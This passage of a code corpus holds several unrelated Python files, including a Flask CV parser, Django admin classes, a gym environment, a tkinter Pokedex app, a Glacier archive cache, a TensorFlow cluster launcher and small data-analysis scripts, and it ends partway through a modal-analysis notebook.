in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/parse', methods=['POST'])\ndef parse_cv():\n if 'file' not in request.files:\n flash('No file part')\n\n file = request.files['file']\n\n if file and allowed_file(file.filename):\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], 'tmp.pdf'))\n\n file_path = 'upload/tmp.pdf'\n text = ''\n for page in extract_text_from_pdf(file_path):\n text += ' ' + page\n\n name = extract_name(text)\n phone = extract_mobile_numbers(text)\n email = extract_emails(text)\n skills = extract_skills(text)\n return jsonify(name=name, phones=phone, emails=email, skills=skills)\n\n\n@app.route('/skills')\ndef skills():\n return jsonify(skills=get_skills())\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183085724","text":"from django.contrib.admin.options import ModelAdmin, TabularInline\nfrom .models import College, SlotBonus, MLBData, DOLSalary, PrMajorsData, SigningBonus, Visitor, Scenario, PrOutPosition, PrOutStatus\nfrom django.contrib import admin\n\nclass CollegeAdmin(ModelAdmin):\n\tlist_filter = ('type',)\n\tsearch_fields = ('school',)\n\tlist_display = ('id', 'school', 'type', 'starting', 'mid_career','start_fx', 'mid_fx')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(College, CollegeAdmin)\n\nclass SlotBonusAdmin(ModelAdmin):\n\tlist_filter = ('draft_cell', )\n\tlist_display = ('id', 'pick', 'amount', 'draft_cell')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(SlotBonus, SlotBonusAdmin)\n\nclass MLBDataAdmin(ModelAdmin):\n\tlist_filter = ('position', 'status', 'draft_cell', 'year')\n\tlist_display = ('id', 'position', 'status', 'draft_cell', 'year', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(MLBData, MLBDataAdmin)\n\nclass DOLSalaryAdmin(ModelAdmin):\n\tsearch_fields = ('occupation',)\n\tlist_display = ('id', 'occupation', 'sal10', 'sal25', 'sal50', 'sal75', 'sal90')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(DOLSalary, DOLSalaryAdmin)\n\nclass PrMajorsDataAdmin(ModelAdmin):\n\tlist_filter = ('position', 'status', 'draft_cell')\n\tlist_display = ('id', 'position', 'status', 'draft_cell', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrMajorsData, PrMajorsDataAdmin)\n\nclass SigningBonusAdmin(ModelAdmin):\n\tlist_filter = ('draft_cell', 'status')\n\tlist_display = ('id', 'draft_cell', 'status', 'amount')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(SigningBonus, SigningBonusAdmin)\n\nclass ScenarioAdmin(ModelAdmin):\n\tlist_filter = ('visitor', 'college')\n\tlist_display = ('id', 'visitor', 'timestamp', 'anonymous', 'college', 'alt', 'sec', 'pick', 'pos', 'status')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(Scenario, ScenarioAdmin)\n\nclass ScenarioInline(TabularInline):\n\tmodel = Scenario\n\treadonly_fields = ('anonymous','college','alt','sec','pick','pos','status')\n\textra = 0\n\nclass VisitorAdmin(ModelAdmin):\n\tlist_display = ('id', 'username', 'fullname', 'ip')\n\treadonly_fields = ('modx_id','username','fullname','ip','user_agent')\n\tinlines = [ScenarioInline,]\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(Visitor, VisitorAdmin)\n\n\nclass PrOutPositionAdmin(ModelAdmin):\n\tlist_filter = ('position', 'year')\n\tlist_display = ('id', 'position', 'year', 
'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrOutPosition, PrOutPositionAdmin)\n\nclass PrOutStatusAdmin(ModelAdmin):\n\tlist_filter = ('status', 'year')\n\tlist_display = ('id', 'status', 'year', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrOutStatus, PrOutStatusAdmin)\n","sub_path":"acefs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158504372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2021/5/10 3:39 PM\n# @File : xiguaenv.py\n# @Author: johnson\n# @Contact : github: johnson7788\n# @Desc : wraps the game in a gym interface; not finished yet\n\nimport numpy as np\nimport gym\nfrom gym import spaces\nfrom stable_baselines3.common.env_checker import check_env\nfrom State import AI_Board\n\nclass DaxiguaEnv(gym.Env):\n    \"\"\"\n    Gym environment for the Daxigua (watermelon-merging) game\n    \"\"\"\n    def __init__(self, grid_size=10):\n        super(DaxiguaEnv, self).__init__()\n        self.grid_size = grid_size\n        # Define the action and observation spaces;\n        # they must be gym.spaces objects.\n        # With discrete actions there are 14 actions here, one per drop position.\n        n_actions = 14\n        self.game = AI_Board()\n        self.action_space = spaces.Discrete(n_actions)\n        # The observation is the image frame returned by the game\n        # (N_CHANNELS, HEIGHT and WIDTH still need to be defined to match the game's frame size).\n        self.observation_space = spaces.Box(low=0, high=255,\n                                            shape=(N_CHANNELS, HEIGHT, WIDTH), dtype=np.uint8)\n\n    def reset(self):\n        \"\"\"\n        Important: the observation must be a numpy array\n        :return: (np.array)\n        \"\"\"\n        # Initialize the agent at the right side of the grid\n        self.agent_pos = self.grid_size - 1\n        # Convert to float32 to be more general (in case we want continuous actions), e.g. returns [9.]\n        return np.array([self.agent_pos]).astype(np.float32)\n\n    def step(self, action):\n        if action == self.LEFT:\n            self.agent_pos -= 1\n        elif action == self.RIGHT:\n            self.agent_pos += 1\n        else:\n            raise ValueError(f\"Received an action outside the action space: {action}\")\n\n        # Clip to the grid bounds: values below 0 become 0, values above grid_size become\n        # grid_size, anything in between is returned unchanged.\n        self.agent_pos = np.clip(self.agent_pos, 0, self.grid_size)\n\n        # Are we at the left edge of the grid? Used to decide whether the episode is done.\n        done = bool(self.agent_pos == 0)\n\n        # The reward is zero everywhere except when reaching the goal (the left edge of the grid).\n        reward = 1 if self.agent_pos == 0 else 0\n\n        # We could pass extra information, but we don't use it for now.\n        info = {}\n        # Return the observation np.array([self.agent_pos]).astype(np.float32), the reward, done and info.\n        return np.array([self.agent_pos]).astype(np.float32), reward, done, info\n\n    def render(self, mode='console'):\n        if mode != 'console':\n            raise NotImplementedError()\n        # Mark the agent position with an x\n        print(\"Current agent position (marked with x): \")\n        print(\".\" * self.agent_pos, end=\"\")\n        print(\"x\", end=\"\")\n        print(\".\" * (self.grid_size - self.agent_pos))\n\n    def close(self):\n        pass\n\n\ndef do_check_env():\n    \"\"\"\n    Check whether our custom env follows the gym interface\n    :return:\n    :rtype:\n    \"\"\"\n    print(\"Checking whether the env satisfies the gym interface\")\n    env = DaxiguaEnv()\n    print(f\"Observation space of the current env: {env.observation_space}\")\n    print(f\"Action space of the current env: {env.action_space}\")\n    print(f\"A sample action from the current env: {env.action_space.sample()}\")\n    # check_env raises an error if the environment does not follow the Gym interface;\n    # it can optionally also check compatibility with Stable-Baselines (warning if necessary).\n    check_env(env, warn=True)\n\n\n\n\nif __name__ == '__main__':\n    do_check_env()","sub_path":"xiguaenv.py","file_name":"xiguaenv.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75246997","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom get_poke_info import Pokedex\nfrom voice_to_text import voice_command\nimport time\n\nclass ToolTip:\n    '''\n    Tooltip class found online\n    '''\n    def __init__(self, button, text='widget info'):\n        self.button = button\n        self.text = text\n        self.button.bind(\"<Enter>\", self.enter)\n        self.button.bind(\"<Leave>\", self.close)\n\n    def enter(self, event=None):\n        x = y = 0\n        x, 
y, cx, cy = self.button.bbox(\"insert\")\n x += self.button.winfo_rootx() + 25\n y += self.button.winfo_rooty() + 20\n self.tooltip = tk.Toplevel(self.button)\n self.tooltip.wm_overrideredirect(True)\n self.tooltip.wm_geometry(\"+%d+%d\" % (x, y))\n label = tk.Label(self.tooltip, text=self.text, justify='left',\n background='yellow', relief='solid', borderwidth=1,\n font=(\"times\", \"8\", \"normal\"))\n label.pack(ipadx=1)\n\n def close(self, event=None):\n if self.tooltip:\n self.tooltip.destroy()\n\ndef add_sprite(file_name, pokemon_icon_slot, bottom_frame):\n size = int(bottom_frame.winfo_height()*0.25)\n img = ImageTk.PhotoImage(Image.open('./poke_sprites/'+ file_name).resize((size, size)))\n pokemon_icon_slot.delete(\"all\")\n pokemon_icon_slot.create_image(0,0, anchor='nw', image=img)\n pokemon_icon_slot.image = img\n\ndef display_results(input_box, button, results, pokemon_icon_slot, bottom_frame, isAudio=False):\n #get id of pokemon by voice input\n if isAudio:\n button['state'] = 'disabled'\n poke_name, poke_description, dex_num = voice_command()\n #In case of error\n if poke_name is None:\n button['state']='normal'\n return\n input_box.delete(0,tk.END)\n input_box.insert(0, str(dex_num))\n time.sleep(1)\n else:\n dex_num = input_box.get().strip()\n poke_name, poke_description = Pokedex.get_poke_info(dex_num)\n results['text'] = 'Name: {}\\nDescription: {}'.format(poke_name, poke_description)\n try:\n poke_icon = Pokedex.get_poke_sprite(poke_name.strip())\n add_sprite(poke_icon, pokemon_icon_slot, bottom_frame)\n except Exception as e:\n print('Exception Occured:' + str(e))\n finally:\n button['state']='normal'\n\n\ndef gui():\n #Create the root\n root = tk.Tk()\n root.title('Voice Dex')\n root.iconbitmap('C:/Users/Daniel/Documents/voice-encoder-gui/pokedex_icon.ico')\n\n #Define the canvas\n HEIGHT = 475\n WIDTH = 400\n canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\n background_image = ImageTk.PhotoImage(Image.open('./pokedex.png').resize((WIDTH, HEIGHT)))\n background_label = tk.Label(root, image=background_image)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n canvas.pack()\n \n #Add the top frame and content\n frame = tk.Frame(root, bg='#c20a19', bd=5)\n frame.place(relx=0.73, rely=0.1, relwidth=0.33, relheight=0.1, anchor='n')\n \n #Adding the input bar\n textbox = tk.Entry(frame, font=40)\n textbox.place(relwidth=0.45, relheight=1)\n\n #Adding the text-search button\n pokeball_icon = tk.PhotoImage(file = './pokeball.png')\n button = tk.Button(frame, text='Pokemon', image=pokeball_icon, font=40, command=lambda: display_results(textbox, button, results, pokemon_icon, bottom_frame))\n button.place(relx=0.47, relheight=1, relwidth=0.25)\n button_tooltip = ToolTip(button, \"Search for a pokemon based on dex num\")\n\n #Adding the audio-search button\n mic_icon = tk.PhotoImage(file='micicon.png')\n audio_button = tk.Button(frame, text='Speak', image=mic_icon, font=40, command=lambda: display_results(textbox, button, results, pokemon_icon, bottom_frame, True))\n audio_button.place(relx=0.74, relheight=1, relwidth=0.25)\n audio_button_tooltip = ToolTip(audio_button, \"Say a number between 1 and 800\")\n\n #Add the bottom frame and content\n bottom_frame = tk.Frame(root, bg='#c20a19', bd=10)\n bottom_frame.place(relx=0.55, rely=0.25, relwidth=0.7, relheight=0.6, anchor='n')\n\n #Display the results of the api call\n bg_color = 'white'\n results = tk.Label(bottom_frame, anchor='nw', wraplength=260, justify='left', bd=4)\n results.config(font=(\"Courier\", 11), 
bg=bg_color)\n    results.place(relwidth=1, relheight=1)\n\n    #sprite icon goes here\n    pokemon_icon = tk.Canvas(results, bg=bg_color, bd=0, highlightthickness=0)\n    pokemon_icon.place(relx=.36, rely=.75, relwidth=1, relheight=0.5)\n\n    root.resizable(False, False)\n    root.mainloop()\n\nif __name__ == '__main__':\n    gui()","sub_path":"pokedex_app.py","file_name":"pokedex_app.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"179741710","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport os.path\nimport time\nimport itertools\nimport logging\nimport pkg_resources\n\nimport sqlalchemy\nimport sqlalchemy.ext.declarative\nimport sqlalchemy.orm\nimport alembic\nimport alembic.command\nimport alembic.config\n\nfrom utils import mkdir_p\n\n\n# There is a lag between an archive being created and the archive\n# appearing on an inventory. Even if the inventory has an InventoryDate\n# of after the archive was created, it still doesn't necessarily appear.\n# So only warn of a missing archive if the archive still hasn't appeared\n# on an inventory created INVENTORY_LAG seconds after the archive was\n# uploaded successfully.\nINVENTORY_LAG = 24 * 60 * 60 * 3\n\nlogger = logging.getLogger(__name__)\n\nBase = sqlalchemy.ext.declarative.declarative_base()\n\nclass Cache(object):\n    class Archive(Base):\n        __tablename__ = 'archive'\n        id = sqlalchemy.Column(sqlalchemy.String(255), primary_key=True)\n        name = sqlalchemy.Column(sqlalchemy.String(255))\n        size = sqlalchemy.Column(sqlalchemy.Integer)\n        vault = sqlalchemy.Column(sqlalchemy.String(255), nullable=False)\n        key = sqlalchemy.Column(sqlalchemy.String(255), nullable=False)\n        last_seen_upstream = sqlalchemy.Column(sqlalchemy.Integer)\n        created_here = sqlalchemy.Column(sqlalchemy.Integer)\n        deleted_here = sqlalchemy.Column(sqlalchemy.Integer)\n\n        def __init__(self, *args, **kwargs):\n            self.created_here = time.time()\n            super(Cache.Archive, self).__init__(*args, **kwargs)\n\n        @property\n        def modified(self):\n            \"\"\"Return best estimate for last modification (or creation/deletion) date\"\"\"\n            if self.deleted_here is not None:\n                return self.deleted_here\n            if self.created_here is not None:\n                return self.created_here\n            return self.last_seen_upstream\n\n    Session = sqlalchemy.orm.sessionmaker()\n\n    def __init__(self, key, db_driver):\n        self.key = key\n        if 'sqlite://' in db_driver:\n            db_path = db_driver[len('sqlite:///'):]\n            mkdir_p(os.path.dirname(db_path))\n            initial_upgrade = False\n            if not os.path.exists(db_path):\n                initial_upgrade = True\n            self.engine = sqlalchemy.create_engine('sqlite:///%s' % db_path)\n            if initial_upgrade:\n                self.upgrade_schema()\n        else:\n            self.engine = sqlalchemy.create_engine(db_driver)\n        self.Session.configure(bind=self.engine)\n        self.session = self.Session()\n\n    def upgrade_schema(self):\n        alembic_ini = pkg_resources.resource_filename(__name__, 'alembic.ini')\n        cfg = alembic.config.Config(alembic_ini)\n        alembic.command.upgrade(cfg, 'head')\n\n    def add_archive(self, vault_name, name, size, archive):\n        self.session.add(self.Archive(key=self.key,\n                         vault=vault_name, name=name, size=size,\n                         id=archive.id))\n        self.session.commit()\n\n    def _get_archive_query_by_ref(self, vault, ref):\n        if ref.startswith('id:'):\n            filter = {'id': ref[3:]}\n        elif ref.startswith('name:'):\n            filter = {'name': ref[5:]}\n        else:\n            filter = {'name': ref}\n        return self.session.query(self.Archive).filter_by(\n            key=self.key, vault=vault, deleted_here=None, **filter)\n\n    def get_archive_id(self, vault, ref):\n        try:\n            result = self._get_archive_query_by_ref(vault, ref).one()\n        except sqlalchemy.orm.exc.NoResultFound:\n            raise KeyError(ref)\n        return result.id\n\n    def get_archive_name(self, vault, ref):\n        try:\n            result = self._get_archive_query_by_ref(vault, ref).one()\n        except sqlalchemy.orm.exc.NoResultFound:\n            raise KeyError(ref)\n        return result.name\n\n    def get_archive_last_seen(self, vault, ref):\n        try:\n            result = self._get_archive_query_by_ref(vault, ref).one()\n        except sqlalchemy.orm.exc.NoResultFound:\n            raise KeyError(ref)\n        return result.last_seen_upstream or result.created_here\n\n    def delete_archive(self, vault, ref):\n        try:\n            result = self._get_archive_query_by_ref(vault, ref).one()\n        except sqlalchemy.orm.exc.NoResultFound:\n            raise KeyError(ref)\n        result.deleted_here = time.time()\n        self.session.commit()\n\n    @staticmethod\n    def _archive_ref(archive, force_id=False):\n        if archive.name and not force_id:\n            if (archive.name.startswith('name:') or\n                    archive.name.startswith('id:')):\n                return \"name:%s\" % archive.name\n            else:\n                return archive.name\n        else:\n            return 'id:' + archive.id\n\n    def get_archive_list_objects(self, vault):\n        for archive in (\n                self.session.query(self.Archive).\n                filter_by(key=self.key,\n                          vault=vault,\n                          deleted_here=None).\n                order_by(self.Archive.name)):\n            yield archive\n\n    def get_archive_list(self, vault):\n        def force_id(archive):\n            return \"\\t\".join([\n                self._archive_ref(archive, force_id=True),\n                \"%s\" % archive.name\n            ])\n\n        for archive_name, archive_iterator in (\n                itertools.groupby(\n                    self.get_archive_list_objects(vault),\n                    lambda archive: archive.name)):\n            # Yield self._archive_ref(..., force_id=True) if there is more than\n            # one archive with the same name; otherwise use force_id=False.\n            first_archive = next(archive_iterator)\n            try:\n                second_archive = next(archive_iterator)\n            except StopIteration:\n                yield self._archive_ref(first_archive, force_id=False)\n            else:\n                yield force_id(first_archive)\n                yield force_id(second_archive)\n                for subsequent_archive in archive_iterator:\n                    yield force_id(subsequent_archive)\n\n    def get_archive_list_with_ids(self, vault):\n        for archive in self.get_archive_list_objects(vault):\n            yield \"\\t\".join([\n                self._archive_ref(archive, force_id=True),\n                \"%s\" % archive.name,\n            ])\n\n    def mark_seen_upstream(\n            self, vault, id, name, size, upstream_creation_date,\n            upstream_inventory_date, upstream_inventory_job_creation_date,\n            fix=False):\n\n        # Inventories don't get recreated unless the vault has changed.\n        # See: https://forums.aws.amazon.com/thread.jspa?threadID=106541\n        #\n        # The cache's last_seen_upstream is supposed to contain a point in time\n        # at which we know for sure that an archive existed, but this can fall\n        # too far behind if a vault doesn't change. So assume that an archive\n        # that appears in an inventory that hasn't been updated recently\n        # nevertheless existed at around the time the inventory _could_ have\n        # been regenerated, ie. at some point prior to the date that we\n        # requested the inventory retrieval job.\n        #\n        # This is preferred over using the job completion date as an archive\n        # could in theory be deleted while an inventory job is in progress and\n        # would still appear in that inventory.\n        #\n        # Making up a date prior to the inventory job's creation could mean\n        # that last_seen_upstream ends up claiming that an archive existed even\n        # before it was created, but this will not cause a problem. 
Better that\n # it's too far back in time than too far ahead.\n #\n # With thanks to Wolfgang Nagele.\n\n last_seen_upstream = max(\n upstream_inventory_date,\n upstream_inventory_job_creation_date - INVENTORY_LAG\n )\n\n try:\n archive = self.session.query(self.Archive).filter_by(\n key=self.key, vault=vault, id=id).one()\n except sqlalchemy.orm.exc.NoResultFound:\n self.session.add(\n self.Archive(\n key=self.key, vault=vault, name=name, size=size, id=id,\n last_seen_upstream=last_seen_upstream\n )\n )\n else:\n if not archive.name:\n archive.name = name\n elif archive.name != name:\n if fix:\n logger.warn('archive %r appears to have changed name from %r ' %\n (archive.id, archive.name) + 'to %r (fixed)' % (name))\n archive.name = name\n else:\n logger.warn('archive %r appears to have changed name from %r ' %\n (archive.id, archive.name) + 'to %r' % (name))\n if not archive.size:\n archive.size = size\n elif archive.size != size:\n if fix:\n logger.warn('archive %r appears to have changed size from %r ' %\n (archive.id, archive.size) + 'to %r (fixed)' % (size))\n archive.size = size\n else:\n logger.warn('archive %r appears to have changed size from %r ' %\n (archive.id, archive.size) + 'to %r' % (size))\n if archive.deleted_here:\n archive_ref = self._archive_ref(archive)\n if archive.deleted_here < upstream_inventory_date:\n logger.warn('archive %r marked deleted but still present' %\n archive_ref)\n else:\n logger.warn('archive %r deletion not yet in inventory' %\n archive_ref)\n archive.last_seen_upstream = last_seen_upstream\n\n def mark_only_seen(self, vault, inventory_date, ids, fix=False):\n upstream_ids = set(ids)\n our_ids = set([r[0] for r in\n self.session.query(self.Archive.id)\n .filter_by(key=self.key, vault=vault).all()])\n missing_ids = our_ids - upstream_ids\n for id in missing_ids:\n archive = (self.session.query(self.Archive)\n .filter_by(key=self.key,\n vault=vault, id=id)\n .one())\n archive_ref = self._archive_ref(archive)\n if archive.deleted_here and archive.deleted_here < inventory_date:\n self.session.delete(archive)\n logger.info('deleted archive %r has left inventory; ' % archive_ref +\n 'removed from cache')\n elif not archive.deleted_here and (\n archive.last_seen_upstream or\n (archive.created_here and\n archive.created_here < inventory_date - INVENTORY_LAG)):\n if fix:\n self.session.delete(archive)\n logger.warn('archive disappeared: %r (removed from cache)' %\n archive_ref)\n else:\n logger.warn('archive disappeared: %r' % archive_ref)\n else:\n logger.warn('new archive not yet in inventory: %r' % archive_ref)\n\n def mark_commit(self):\n self.session.commit()\n","sub_path":"glacier/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512862332","text":"import json\nimport sys\nimport time\n\nsys.path.append(\"../MachineManager\")\n\nimport ClusterAPI\nimport cluster_settings\n\nclass Task:\n\tdef __init__(self,name,machineList):\n\t\tself.name = name\n\t\tself.machineList = machineList\n\ndef get_ps_job(task_id):\n\tDockerFileName = \"TF_PS_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\tjob = ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"ps\",\"not_started\")\n\tjob.set_TaskId(task_id)\n\treturn job\n\ndef get_worker_job(task_id):\n\tDockerFileName = \"TF_WORKER_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\tjob = 
ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"worker\",\"not_started\")\n\tjob.set_TaskId(task_id)\n\treturn job\n\ndef get_single_job():\n\tDockerFileName = \"TF_SINGLE_GPU\"\n\tDockerBuildPath = \"../\"\n\tPort = \"2222\"\n\treturn ClusterAPI.Job(DockerFileName,DockerBuildPath,Port,\"single\",\"not_started\")\n\ndef get_machine(ip_address,machine_type,job):\n\treturn ClusterAPI.Machine(ip_address,machine_type,job) \n\n\ndef get_task_name(dataset_name,network_name):\n\treturn time.strftime('%Y:%m:%d:%H:%M:%S',time.localtime(time.time()))+\":\"+dataset_name+\":\"+network_name\n\ndef set_Task_Param_Single(cluster,json_data,task_name):\n\tbatch_size = json_data['batch_size']\n\tlearning_rate = json_data['learning_rate']\n\tnetwork = json_data['network']\n\tdataset_url = json_data['dataset_url']\n\n\tparam = {}\n\tparam['batch_size'] = batch_size\n\tparam['learning_rate'] = learning_rate\n\tparam['dataset_url'] = dataset_url\n\tparam['network'] = network\n\n\tcluster.UpdateTaskParam(task_name,param)\n\ndef set_Task_Param(cluster,json_data,task_name,ps_spec,worker_spec,port):\n\tbatch_size = json_data['batch_size']\n\tlearning_rate = json_data['learning_rate']\n\tnetwork = json_data['network']\n\tdataset_url = json_data['dataset_url']\n\n\tparam = {}\n\tparam['batch_size'] = batch_size\n\tparam['learning_rate'] = learning_rate\n\tparam['dataset_url'] = dataset_url\n\tparam['network'] = network\n\tparam['ps_spec'] = ps_spec\n\tparam['worker_spec'] = worker_spec\n\tparam['port'] = port\n\n\tcluster.UpdateTaskParam(task_name,param)\n\n\ndef Train(json_data):\n\t# connect_url = [\"localhost:27017\"]\n\tconnect_url = cluster_settings.connect_url\n\tcluster = ClusterAPI.Cluster(connect_url)\n\tnodes = cluster.get_AviableMachines()\n\tprint(nodes)\n\tif len(nodes)>1:\n\t\tmachineList = []\n\t\tps_machine = get_machine(nodes[0],\"gpu\",get_ps_job(0))\n\t\tmachineList.append(ps_machine)\n\t\tfor i in range(1,len(nodes)):\n\t\t\tworker_machine = get_machine(nodes[i],\"gpu\",get_worker_job(i-1))\n\t\t\tmachineList.append(worker_machine)\n\t\tdataset_name = json_data['dataset_name']\n\t\tnetwork_name = json_data['network_name']\n\t\ttask_name = get_task_name(dataset_name,network_name)\n\t\ttask = ClusterAPI.Task(task_name,machineList)\n\t\tps_spec = [nodes[0]]\n\t\tworker_spec = nodes[1:]\n\t\tset_Task_Param(cluster,json_data,task_name,ps_spec,worker_spec,\"2222\")\n\t\tcluster.AddTask(task)\n\t\terror_list = cluster.AssignTask(task)\n\telif len(nodes)==1:\n\t\tmachineList = []\n\t\tsingle_machine = get_machine(nodes[0],\"gpu\",get_single_job())\n\t\tmachineList.append(single_machine)\n\t\tdataset_name = json_data['dataset_name']\n\t\tnetwork_name = json_data['network_name']\n\t\ttask_name = get_task_name(dataset_name,network_name)\n\t\ttask = ClusterAPI.Task(task_name,machineList)\n\t\tset_Task_Param_Single(cluster,json_data,task_name)\n\t\tcluster.AddTask(task)\n\t\terror_list = cluster.AssignTask(task)\n\t\tprint(task_name)\n\n\njson_data = {}\njson_data['dataset_name'] = \"cifar-10\"\njson_data['network_name'] = \"conv_net\"\njson_data['batch_size'] = 200\njson_data['learning_rate'] = 0.01\njson_data['dataset_url'] = \"./cifar-10-batches-py\"\nwith open('./test.json',\"r\") as json_file:\n\tjson_obj = json.load(json_file)\nnetwork = json.dumps(json_obj)\njson_data['network'] = 
network\n\nTrain(json_data)\n","sub_path":"DeepLearningManager/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496537157","text":"import pandas as pd\r\nimport statistics\r\n\r\ndf = pd.read_csv(\"data.csv\")\r\ndata1 = df[\"math score\"].tolist()\r\ndata2 = df[\"reading score\"].tolist()\r\ndata3 = df[\"writing score\"].tolist()\r\n\r\ndata = []\r\n\r\nrow = 0\r\n\r\nfor i in data1:\r\n k = int(data1[row]) + int(data2[row]) + int(data3[row])\r\n data.append(k)\r\n row = row + 1\r\n\r\nprint(data)\r\n\r\nmean = statistics.mean(data)\r\n\r\nsd = statistics.stdev(data)\r\n\r\nrange1h_min, range1h_max = mean - sd, mean + sd\r\nrange2h_min, range2h_max = mean - 2*sd, mean + 2*sd\r\nrange3h_min, range3h_max = mean - 3*sd, mean + 3*sd\r\n\r\n#range1h = []\r\n#for i in data:\r\n #if i > range1h_min and i < range1h_max:\r\n #range1h.append(i)\r\n\r\n#One line code from the above for loop\r\nrange1h = [i for i in data if i > range1h_min and i < range1h_max] \r\nrange2h = [i for i in data if i > range2h_min and i < range2h_max]\r\nrange3h = [i for i in data if i > range3h_min and i < range3h_max]\r\n\r\nrange1length = len(range1h)\r\nrange2length = len(range2h)\r\nrange3length = len(range3h)\r\n\r\ndatalength = len(data)\r\n\r\nrange1_percentage = (range1length/datalength) * 100\r\nrange2_percentage = (range2length/datalength) * 100\r\nrange3_percentage = (range3length/datalength) * 100\r\n\r\nprint(\"Range 1 percentage = \" + str(range1_percentage), \", Range 2 percentage = \" + str(range2_percentage),\", Range 3 percentage = \" + str(range3_percentage))","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88649259","text":"\r\nimport networkx as nx\r\nimport igraph as ig\r\nfrom igraph import *\r\n\r\nG = Graph.Read_GraphML(\"karate.GraphML\") #igraph version of data for partitioning\r\n\r\nFR = nx.read_graphml(\"karate.GraphML\")\r\n\r\n# setup various FR iterations\r\niters = 2\r\n\r\nnumNodes=len(G.vs)\r\n\r\n# FR layout\r\nseedPos=G.layout_grid()\r\n\r\nposFR=G.layout(\"fr\", seed=seedPos, maxiter=iters, minx = [10]*numNodes, maxx=[500]*numNodes, miny=[0]*numNodes, maxy=[500]*numNodes)\r\n\r\n# Spread out positions\r\nposFR2=[0 for pair in posFR]\r\n\r\nfor idx,pair in enumerate(posFR):\r\n posFR2[idx] = [x*7 for x in pair]\r\n\r\n# initialize all nodes to have group array, x and y coordinates\r\nfor idx,n in enumerate(FR.nodes()):\r\n FR.node[n]['group']=[0]\r\n FR.node[n]['y']=posFR2[idx][1]\r\n FR.node[n]['x']=posFR2[idx][0]\r\n \r\n# KK layout\r\n# posKK=\r\n\r\n# Turn networkx graph into a json:\r\n\r\nfrom networkx.readwrite import json_graph\r\nimport json\r\n\r\ndata=json_graph.node_link_data(FR)\r\n# print data['nodes']\r\nwith open('fr2.js', 'w') as outfile:\r\n json.dump(data, outfile)\r\n\r\n","sub_path":"python/compareLayoutsFR.py","file_name":"compareLayoutsFR.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653292246","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Python example\n\n# In[2]:\n\n\nimport koma, koma.oma\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.signal import resample, detrend\n\nimport pandas as pd\n\n\n# ## Load data and define input\n# \n\n# In[13]:\n\n\n# Import and 
specify properties of input data\ndf = pd.read_csv('response_data.csv', sep=',',header=None)\ndata = df.values   # data including noise\nlevels = 3\nfs = 35\nt = np.arange(0,1/fs*(data.shape[0]),1/fs)\n\n# Cov-SSI settings\ni = 20\ns = 4\norders = np.arange(2, 50+2, 2)\nstabcrit = {'freq':0.2, 'damping': 0.2, 'mac': 0.3}\n\n# Noise specification\nnoise_factor = 1.0\n\n\n# ## Add artificial noise and plot response\n\n# In[4]:\n\n\nnoise = np.std(data) * noise_factor\ndata_noised = data + noise*np.random.randn(data.shape[0], data.shape[1])\n\nfig, ax = plt.subplots(nrows=3, ncols=1, num=1)\nax[0].plot(t, data_noised[:,0])\nax[0].plot(t, data[:,0], color='IndianRed', alpha=1)\nax[1].plot(t, data_noised[:,3])\nax[1].plot(t, data[:,3], color='IndianRed', alpha=1)\nax[2].plot(t, data_noised[:,6])\nax[2].plot(t, data[:,6], color='IndianRed', alpha=1)\n\n__ = [a.set_xticks([]) for a in ax[0:2]]\n__ = ax[2].set_xlabel('Time [s]')\n\n__ = ax[0].set_ylabel('Level 3')\n__ = ax[1].set_ylabel('Level 2')\n__ = ax[2].set_ylabel('Level 1')\n\n\n# ## Preprocess\n\n# In[5]:\n\n\nfs_rs = 3    # resample frequency\ndata_rs = resample(detrend(data), int(np.ceil(data.shape[0]*fs_rs/fs)), axis=0)    # detrend and resample\nfs_rs = data_rs.shape[0]/data.shape[0]*fs\n\n\n# ## Cov-SSI call\n\n# In[6]:\n\n\nlambd, phi = koma.oma.covssi(data_rs, fs_rs, i, 